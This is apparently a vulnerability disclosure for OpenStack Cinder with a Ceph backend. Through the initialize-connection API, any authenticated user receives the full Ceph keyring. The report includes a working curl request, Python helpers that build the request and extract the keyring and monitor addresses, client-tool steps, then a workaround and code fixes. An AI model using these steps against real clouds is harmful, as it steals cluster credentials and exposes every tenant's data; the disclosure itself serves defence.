Cinder + ceph backend, secret key leak
Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files
As an authenticated simple user, create a cinder volume that ends up on a ceph backend,
then reuse the os.initialize_connection api call
(used by nova-compute/cinder-backup to attach volumes locally to the host running the services):
curl -g -i -X POST https://<cinder_controller>/v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \
  -H "Accept: application/json" \
  -H "Content-Type: application/json" \
  -H "OpenStack-API-Version: volume 3.15" \
  -H "X-Auth-Token: $TOKEN" \
  -d '{"os-initialize_connection": {"connector":{}}}'
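If scripting the call instead, the same request can be built programmatically. A minimal sketch (the helper name is hypothetical; endpoint, project id and volume id are the placeholders from the curl example above):

```python
import json

def build_initialize_connection_request(endpoint, project_id, volume_id, token):
    """Build the os-initialize_connection action request (hypothetical helper).

    Returns (url, headers, body) usable with any HTTP client; an empty
    connector is all it takes to trigger the disclosure on a vulnerable
    deployment.
    """
    url = f"{endpoint}/v3/{project_id}/volumes/{volume_id}/action"
    headers = {
        "Accept": "application/json",
        "Content-Type": "application/json",
        "OpenStack-API-Version": "volume 3.15",
        "X-Auth-Token": token,
    }
    body = json.dumps({"os-initialize_connection": {"connector": {}}})
    return url, headers, body
```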
If you do not want to forge the http request, openstack clients and extensions may prove helpful.
As root:
apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common
virtualenv -p python3 venv_openstack
source venv_openstack/bin/activate
pip install python-openstackclient
pip install python-cinderclient
pip install os-brick
pip install python-brick-cinderclient-ext
cinder create vol 1
cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879
This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access
to all the volumes within the cluster.
{
   "connection_info" : {
      "driver_volume_type" : "rbd",
      "data" : {
         "access_mode" : "rw",
         "secret_uuid" : "SECRET_UUID",
         "cluster_name" : "ceph",
         "encrypted" : false,
         "auth_enabled" : true,
         "qos_specs" : {
            "write_iops_sec" : "3050",
            "read_iops_sec" : "3050"
         },
         "secret_type" : "ceph",
         "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",
         "auth_username" : "cinder",
         "discard" : true,
         "keyring" : "SECRETFILETOHIDE",
         "ports" : [
            "6789",
            "6789",
            "6789"
         ],
         "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",
         "hosts" : [
            "ceph_host1",
            "ceph_host2",
            ...
         ]
      }
   }
}
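The secret material is trivially machine-extractable from that response; for illustration, a short sketch pulling out the sensitive fields named in the sample output above (function name is hypothetical):

```python
import json

def extract_ceph_secrets(response_text):
    """Pull the cluster-wide secrets out of an os-initialize_connection reply."""
    data = json.loads(response_text)["connection_info"]["data"]
    return {
        "keyring": data.get("keyring"),          # the whole ceph keyring file
        "secret_uuid": data.get("secret_uuid"),
        "auth_username": data.get("auth_username"),
        # monitor addresses, zipped host/port pairs
        "mons": list(zip(data.get("hosts", []), data.get("ports", []))),
    }
```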
Quick workaround:
1. Remove the rbd_keyring_conf param from any cinder config file; this will mitigate the information disclosure.
2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts
(/etc/cinder/<backend_name>.keyring.conf, to be confirmed).
Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in
libvirt secrets already, making this keyring disclosure useless to them.
(To be confirmed: other compute drivers might be impacted by this.)
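For illustration, a cinder.conf RBD backend section showing where the offending option sits (section name and paths are hypothetical examples); the workaround is to drop the rbd_keyring_conf line:

```ini
[ceph]
volume_driver = cinder.volume.drivers.rbd.RBDDriver
rbd_pool = volumes
rbd_user = cinder
rbd_secret_uuid = SECRET_UUID
# Remove this line: its content ends up verbatim in the
# os-initialize_connection response returned to simple users.
# rbd_keyring_conf = /etc/ceph/ceph.client.cinder.keyring
```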
Quick code fix:
Mandatory: revert this commit https://review.opendev.org/#/c/456672/
Optional: revert this one https://review.opendev.org/#/c/465044/, not harmful in itself, but pointless once the first one has been reverted
Long term code fix proposals:
What the os.initialize_connection api call is meant to do: allow simple users to use cinder as block storage as a service,
in order to attach volumes outside the scope of any virtual machines/nova.
Thus, the information returned by this call should be enough for the caller to attach the volume,
but it should not disclose anything that would let them do more than that.
Since that is not possible at all with ceph (there is no tenant isolation within a ceph cluster),
the cinder backend for ceph should not implement this route at all.
There is indeed no reason for cinder to disclose anything about the ceph cluster here, including hosts and cluster ids,
if the attach is doomed to fail anyway for users missing the secrets.
Then, any 'admin' service using this call to locally attach volumes (nova-compute, cinder-backup...) should be modified to:
- check the caller's rw permissions on the requested volumes
- escalate the request
- go through a new admin api route, not this 'user' one
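The proposal above could be sketched as follows; everything here (class, method and attribute names, the context object) is hypothetical and only illustrates the proposed split between the user route and a permission-checked admin route, not actual cinder code:

```python
class VolumeActionsController:
    """Sketch of the proposed user/admin split for initialize_connection."""

    def initialize_connection(self, context, volume, connector):
        # User-facing route: an rbd/ceph backend has no tenant isolation
        # to offer, so it should simply not implement this action.
        if volume.backend_protocol == "rbd":
            raise NotImplementedError("rbd: no tenant-isolated attach possible")
        return self._connection_info(volume, connector)

    def admin_initialize_connection(self, context, volume, connector):
        # Admin route for nova-compute / cinder-backup style services:
        # 1. check the caller's rw permission on the requested volume,
        if not context.can_write(volume):
            raise PermissionError("caller has no rw access to this volume")
        # 2. require the escalated/admin context for this dedicated route.
        if not context.is_admin:
            raise PermissionError("admin api route requires an admin context")
        return self._connection_info(volume, connector)

    def _connection_info(self, volume, connector):
        # Placeholder for the driver's real connection-info assembly.
        return {"driver_volume_type": volume.backend_protocol, "data": {}}
```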